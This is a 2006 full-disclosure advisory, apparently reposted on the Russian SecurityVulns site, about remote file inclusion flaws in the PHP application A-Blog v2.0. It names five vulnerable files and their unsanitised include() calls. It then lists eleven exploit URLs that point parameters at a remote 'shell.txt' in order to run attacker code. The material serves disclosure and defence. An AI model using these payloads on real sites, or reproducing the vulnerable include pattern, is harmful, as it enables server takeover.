Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA22122] PhotoStore Cross-Site Scripting Vulnerabilities

  [SA22092] Opial Audio/Video Download Management Cross-Site Scripting

  [SA22117] eyeOS Cross-Site Scripting Vulnerabilities

  Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit

From:v1per-haCker <v1per-hacker_(at)_hotmail.com>
Date:28 сентября 2006 г.
Subject:A-Blog v2.0 Remote File Include

#================================================================================
==============
#A-Blog v2.0 Remote File Include
#================================================================================
===============
#
#Critical Level : Dangerous
#
#A-Blog
#http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download
#Version : v2.0
#
#================================================================================
================
#Bug in :
#/navigation/links.php
#/navigation/search.php
#/navigation/donation.php
#/navigation/latestnews.php
#/sources/myaccount.php
#
#================================================================================
================
#Vlu Code :
#include("$navigation_start")
#include("$navigation_middle")
#include("$navigation_end")
#include("$open_box")
#include("$middle_box")
#include("$close_box")
#================================================================================
================
#
#Exploit :
#
#http://localhost/A-Blog/sources/myaccount.php?open_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?middle_box=http://shell.txt?
#http://localhost/A-Blog/sources/myaccount.php?close_box=http://shell.txt?
#http://localhost/A-Blog/navigation/search.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/donation.php?navigation_end=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/latestnews.php?navigation_middle=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_start=http://shell.txt?
#http://localhost/A-Blog/navigation/links.php?navigation_middle=http://shell.txt?

#================================================================================
================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#and all members in XP10_hackEr Team
#WWW.XP10.COM
=================================================================================
=================

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород